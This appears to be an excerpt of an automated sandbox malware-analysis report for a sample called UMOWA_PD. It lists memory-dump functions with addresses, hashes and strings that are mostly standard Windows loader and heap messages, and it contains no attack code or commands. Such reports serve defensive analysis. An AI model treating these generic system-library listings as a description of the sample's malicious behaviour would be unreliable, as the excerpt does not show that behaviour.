                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                                    • API String ID: 0-2779062949
                                                                                    • Opcode ID: 44bb51e9e3d1930c5a312a9c8c42a00682a6946486c92d2ba54772783aacd14e
                                                                                    • Instruction ID: 145dd04a23bb1fdd9f5a6cde17d65a165796a3d3bf2a0ab7fea23bd0a2d19d4a
                                                                                    • Opcode Fuzzy Hash: 44bb51e9e3d1930c5a312a9c8c42a00682a6946486c92d2ba54772783aacd14e
                                                                                    • Instruction Fuzzy Hash: 43A19C79D016299BDB21DF24CC88B9AB3B8EF44705F1145EAE908EB250DB359EC4CF50
                                                                                    Function 33C9B360 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                    • API String ID: 0-373624363
                                                                                    • Opcode ID: 74a46cb5fbab495ae059f58f5bcb2ce2fb66720f9d8241fc1805d8df614bb779
                                                                                    • Instruction ID: 161542a737f9d7e0bdd73fa5adf3b00391f721c1d72323e50d27f6902d61fd12
                                                                                    • Opcode Fuzzy Hash: 74a46cb5fbab495ae059f58f5bcb2ce2fb66720f9d8241fc1805d8df614bb779
                                                                                    • Instruction Fuzzy Hash: 2991DD75A04749EBEB11DF95C4407EEB3B0FF44354F2A4199E850EF290D7799A80CB90
                                                                                    Function 33D6B2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • TargetNtPath, xrefs: 33D6B3AF
                                                                                    • GlobalizationUserSettings, xrefs: 33D6B3B4
                                                                                    • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 33D6B3AA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                    • API String ID: 0-505981995
                                                                                    • Opcode ID: 8aa721e383213fa3d2141999f34784b614b3f3a86cf6f4120629dcdc4b637748
                                                                                    • Instruction ID: 65bd54e45cd6a997ee99d39bbf63dfb4ecdc25e0503cd95dcd86c0042c66d2b1
                                                                                    • Opcode Fuzzy Hash: 8aa721e383213fa3d2141999f34784b614b3f3a86cf6f4120629dcdc4b637748
                                                                                    • Instruction Fuzzy Hash: 5061BB72D41729ABDB20DF55DC98BDAB7B8AB44714F8101E8E918EB250CB74DE84CF90
                                                                                    Function 33C8F75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • HEAP: , xrefs: 33CEE442
                                                                                    • HEAP[%wZ]: , xrefs: 33CEE435
                                                                                    • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 33CEE455
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                    • API String ID: 0-1340214556
                                                                                    • Opcode ID: cb930c289d4b3e5393c23899279c19aff7d534b54eb6eaf81a22c8aa8bf4cb12
                                                                                    • Instruction ID: 6af6308179a4848db0a96c6ff0c9e5db5cae14cddbb7ea35369a1b61c950d37c
                                                                                    • Opcode Fuzzy Hash: cb930c289d4b3e5393c23899279c19aff7d534b54eb6eaf81a22c8aa8bf4cb12
                                                                                    • Instruction Fuzzy Hash: C5510936604B84AFE312CBA8D884F9ABBF8FF05748F0445A5E590CF662D774EA51CB50
                                                                                    Function 33CB1514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • Could not validate the crypto signature for DLL %wZ, xrefs: 33CFA396
                                                                                    • minkernel\ntdll\ldrmap.c, xrefs: 33CFA3A7
                                                                                    • LdrpCompleteMapModule, xrefs: 33CFA39D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                    • API String ID: 0-1676968949
                                                                                    • Opcode ID: 977355dc1a1f17275b4d0913ae4de61b169197559eceea20f8a2b12e88e3b3ba
                                                                                    • Instruction ID: 4322288505b18821ab9863d53fc8a62ad1f64479d46e6518a384017433e39021
                                                                                    • Opcode Fuzzy Hash: 977355dc1a1f17275b4d0913ae4de61b169197559eceea20f8a2b12e88e3b3ba
                                                                                    • Instruction Fuzzy Hash: B651D279A04B419FEB11DB69C944B1ABBF4AF00B54F180694E992DF7E2DB74E904CB40
                                                                                    Function 33D3D62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • HEAP: , xrefs: 33D3D79F
                                                                                    • HEAP[%wZ]: , xrefs: 33D3D792
                                                                                    • Heap block at %p modified at %p past requested size of %Ix, xrefs: 33D3D7B2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                    • API String ID: 0-3815128232
                                                                                    • Opcode ID: f4a71cddefab4a120ed6743fa0582268866ae74a36832e6222a49e1e59fbaa79
                                                                                    • Instruction ID: 41f1dfd0ed64fe3b7ba3908e4bfd18571a7c864efe516a52e20e434fa289f670
                                                                                    • Opcode Fuzzy Hash: f4a71cddefab4a120ed6743fa0582268866ae74a36832e6222a49e1e59fbaa79
                                                                                    • Instruction Fuzzy Hash: 065124B91023548EF360EB29C84077273E2EB476A4F554889E4E6CB68DD636EC47DF60
                                                                                    Function 33C8753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                    • API String ID: 0-1151232445
                                                                                    • Opcode ID: f268272ff8c3f33e879241e3621d3ccd059c08392c06b0e9981d4dbdde76ec1b
                                                                                    • Instruction ID: 7fbcb0aac7daadd47c04446f21ae4fa087a1c07c99ebe9cd42594af493ca4085
                                                                                    • Opcode Fuzzy Hash: f268272ff8c3f33e879241e3621d3ccd059c08392c06b0e9981d4dbdde76ec1b
                                                                                    • Instruction Fuzzy Hash: 8841567D6003508FEB14CE59C4C0BA577E8AF0134EF6840A9E485CFA66DA75E786CB21
                                                                                    Function 33CC15EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • LdrpAllocateTls, xrefs: 33D0194A
                                                                                    • minkernel\ntdll\ldrtls.c, xrefs: 33D01954
                                                                                    • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 33D01943
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                    • API String ID: 0-4274184382
                                                                                    • Opcode ID: df6be86697dd81a69a576fe79fec032adac7c0c9744f7a3f5fe3862bc0c0b4f3
                                                                                    • Instruction ID: b74d7f91f6863bad8827a3a0d24c54b6857048482d545d669961fc042ecba382
                                                                                    • Opcode Fuzzy Hash: df6be86697dd81a69a576fe79fec032adac7c0c9744f7a3f5fe3862bc0c0b4f3
                                                                                    • Instruction Fuzzy Hash: A54149B9E00B45AFDB14CFA9D881AADBBF5FF48700F058119E815EB651DB35A901CF90
                                                                                    Function 33CC32C0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • RtlCreateActivationContext, xrefs: 33D02803
                                                                                    • Actx , xrefs: 33CC32CC
                                                                                    • SXS: %s() passed the empty activation context data, xrefs: 33D02808
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                    • API String ID: 0-859632880
                                                                                    • Opcode ID: 9d65c633553e5444c898cc9fcb842711026dd54e8affbf339f60313178beb3e7
                                                                                    • Instruction ID: 13dd987cd8e45e35bba2589553b55b5e8b6f4ef73237e83a602592f64b1bcf8d
                                                                                    • Opcode Fuzzy Hash: 9d65c633553e5444c898cc9fcb842711026dd54e8affbf339f60313178beb3e7
                                                                                    • Instruction Fuzzy Hash: 54310176A013459FEB02CE68E8D0B9A77A4EF44B14F194469EC05DF286CB74E80ACBD0
                                                                                    Function 33D1B214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • GlobalFlag, xrefs: 33D1B30F
                                                                                    • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 33D1B2B2
                                                                                    • @, xrefs: 33D1B2F0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                    • API String ID: 0-4192008846
                                                                                    • Opcode ID: 7b1f8258e5830507f6bcf6f8e555948a2bc4f1858ab542f9c055debfa7096e94
                                                                                    • Instruction ID: c3bf38f101b254f91bb867d5786641054708346a5555c4e59684dee181c4319e
                                                                                    • Opcode Fuzzy Hash: 7b1f8258e5830507f6bcf6f8e555948a2bc4f1858ab542f9c055debfa7096e94
                                                                                    • Instruction Fuzzy Hash: 19314AB1E00609AFDB50DF94DC80AEEBBBCEF44744F4504A9EA05EB241D7B49E14CBA0
                                                                                    Function 33CC1527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • DLL "%wZ" has TLS information at %p, xrefs: 33D0184A
                                                                                    • LdrpInitializeTls, xrefs: 33D01851
                                                                                    • minkernel\ntdll\ldrtls.c, xrefs: 33D0185B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                    • API String ID: 0-931879808
                                                                                    • Opcode ID: a6a926956ef05d6827ec841e64a03cb5c3b31511ba90ebc59664af43e2ceff85
                                                                                    • Instruction ID: b7a467b62cbfaf6c59e37729577a0af3ac5b4679aca5c9aaa82f2457f9168626
                                                                                    • Opcode Fuzzy Hash: a6a926956ef05d6827ec841e64a03cb5c3b31511ba90ebc59664af43e2ceff85
                                                                                    • Instruction Fuzzy Hash: FA31D172A60340BFE710AB56C885B6A77A9AF44754F050059F542FB681DB70FE468BA0
                                                                                    Function 33CD1190 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • @, xrefs: 33CD11C5
                                                                                    • BuildLabEx, xrefs: 33CD122F
                                                                                    • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 33CD119B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                    • API String ID: 0-3051831665
                                                                                    • Opcode ID: 760b537d3be61d34daff739933b3035096550dba3921f427743609871724948b
                                                                                    • Instruction ID: e6b7b6ad2e5d3f80b43d5f29d9111ccbcc8b913c40a5afd710beaafd78a44b68
                                                                                    • Opcode Fuzzy Hash: 760b537d3be61d34daff739933b3035096550dba3921f427743609871724948b
                                                                                    • Instruction Fuzzy Hash: 1A315E72D00719BBDB11DBA5CC44EAFBBB9EF84650F014025F615E7660DB31DA458BA0
                                                                                    Function 33D185AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 33D185DE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                    • API String ID: 0-702105204
                                                                                    • Opcode ID: 0855920d87569f82e4d6ef994f3b6b001df8b97a5a0cfde32019c9c22ee60585
                                                                                    • Instruction ID: f3144de7c67cb1f8eb80e4dcce1fb372be8ece8a8a4c97708245899e7dcb5d79
                                                                                    • Opcode Fuzzy Hash: 0855920d87569f82e4d6ef994f3b6b001df8b97a5a0cfde32019c9c22ee60585
                                                                                    • Instruction Fuzzy Hash: A8017B36E207089FE2A0EB50F844F56B7ABEF41762F440058E4425B862CF2478A5CAA4
                                                                                    Function 33C97623 Relevance: 3.2, APIs: 2, Instructions: 179COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cd352763ec0978507c9e8848400733ba360ca4499dd377b4ac04b33679f886cd
                                                                                    • Instruction ID: 40f932cdea2c8587b8839a427608f10bbab1434fa57136ff41186211cff65838
                                                                                    • Opcode Fuzzy Hash: cd352763ec0978507c9e8848400733ba360ca4499dd377b4ac04b33679f886cd
                                                                                    • Instruction Fuzzy Hash: 46616275E01606AFEB09CF79C880A9DFBB5BF48744F25816AE419EB300DB34A951CBD0
                                                                                    Function 33CA51C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$@
                                                                                    • API String ID: 0-149943524
                                                                                    • Opcode ID: 78a2c6c9651a7f9fe8afd6637b8dcb0adf4833deaf4472b3353decb80d322bfe
                                                                                    • Instruction ID: 50a57290518367901fb30001edbe099e330dd7991e6be35236b1527e98d74849
                                                                                    • Opcode Fuzzy Hash: 78a2c6c9651a7f9fe8afd6637b8dcb0adf4833deaf4472b3353decb80d322bfe
                                                                                    • Instruction Fuzzy Hash: 5B329AB46083128BD7248F19C480B2EB7F6EF88744F54892EF9C5DB691EB35D854CB92
                                                                                    Function 33C95622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID:
                                                                                    • API String ID: 3446177414-0
                                                                                    • Opcode ID: dd0af8b8511cc72867414468979c3bf051c050c4e9a981f242390027519136c5
                                                                                    • Instruction ID: 43068f1ef8e572b760aee3cad3d487afc31ec558f92bac60e85ca7323b36d7fb
                                                                                    • Opcode Fuzzy Hash: dd0af8b8511cc72867414468979c3bf051c050c4e9a981f242390027519136c5
                                                                                    • Instruction Fuzzy Hash: FB31CD35A01B12EFE7859F25C940ACAFBA9BF84B54F460125E941CBF51DB75E821CB80
                                                                                    Function 33D0E372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: Legacy$UEFI
                                                                                    • API String ID: 2994545307-634100481
                                                                                    • Opcode ID: a71020f87a300ee4e5db33a323e75a0caa8d0f75d27e4be68844ee9b1fcce517
                                                                                    • Instruction ID: 8a4f7fdc27bb36b0d67924eba66255ef0804faa0d951f01454fe589a7903928e
                                                                                    • Opcode Fuzzy Hash: a71020f87a300ee4e5db33a323e75a0caa8d0f75d27e4be68844ee9b1fcce517
                                                                                    • Instruction Fuzzy Hash: 81615CB2E00B089FDB15CFA8C940AADB7B9FF48B40F54446EE549EB661EA30D900CF50
                                                                                    Function 33D6B55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • RedirectedKey, xrefs: 33D6B60E
                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 33D6B5C4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                    • API String ID: 0-1388552009
                                                                                    • Opcode ID: 27905fc0c95f3aa055fee585e2dd16871ac29a92089b43b98ca9a742beb11edc
                                                                                    • Instruction ID: a9def6a8d38bf76871ec337f2b30a0d66311029bc91dfabe65d0733be8680261
                                                                                    • Opcode Fuzzy Hash: 27905fc0c95f3aa055fee585e2dd16871ac29a92089b43b98ca9a742beb11edc
                                                                                    • Instruction Fuzzy Hash: 996103B5C00219EFDB11DF96C888ADEBBB8FB48715F54406AF914E7240E7749A46CFA0
                                                                                    Function 33CAF640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: $$$
                                                                                    • API String ID: 3446177414-233714265
                                                                                    • Opcode ID: b9490936acd61bc1a662e8324300b4b6a5f1d30852d6dacc8667934a5510c5a0
                                                                                    • Instruction ID: 7386676c1a3d308cbe34fc6f121994e265e3f9088cf8ac047988d48d39a19bd5
                                                                                    • Opcode Fuzzy Hash: b9490936acd61bc1a662e8324300b4b6a5f1d30852d6dacc8667934a5510c5a0
                                                                                    • Instruction Fuzzy Hash: EF61B976E01B4ACBEB21CFA8C980B9DB7F2BF44708F154169D515EBA80CB75A941CB90
                                                                                    Function 33C9A1E3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 33C9A229
                                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 33C9A21B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                    • API String ID: 0-2876891731
                                                                                    • Opcode ID: f96bcd99bbd1592095cd8feabca9135f739ef294f000e1efbb22f87bc06bed3f
                                                                                    • Instruction ID: f35e249c7961200bfcf95b3b4ae483b5b5a13bed400fde375557112a8008e9d4
                                                                                    • Opcode Fuzzy Hash: f96bcd99bbd1592095cd8feabca9135f739ef294f000e1efbb22f87bc06bed3f
                                                                                    • Instruction Fuzzy Hash: E941B078A00B45EBE705CF9AC890B99B7B4EF85744F1941A5EC48DF291E636EA50CB10
                                                                                    Function 33D2314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                    • API String ID: 0-118005554
                                                                                    • Opcode ID: 63fecd1812cef35be5569257fcb2cca38aea575a529ac59ed776c48ee04615f6
                                                                                    • Instruction ID: 6fd2e28668431bf0a6de715636b0c9592325d857428d4f219acf38f845069ca4
                                                                                    • Opcode Fuzzy Hash: 63fecd1812cef35be5569257fcb2cca38aea575a529ac59ed776c48ee04615f6
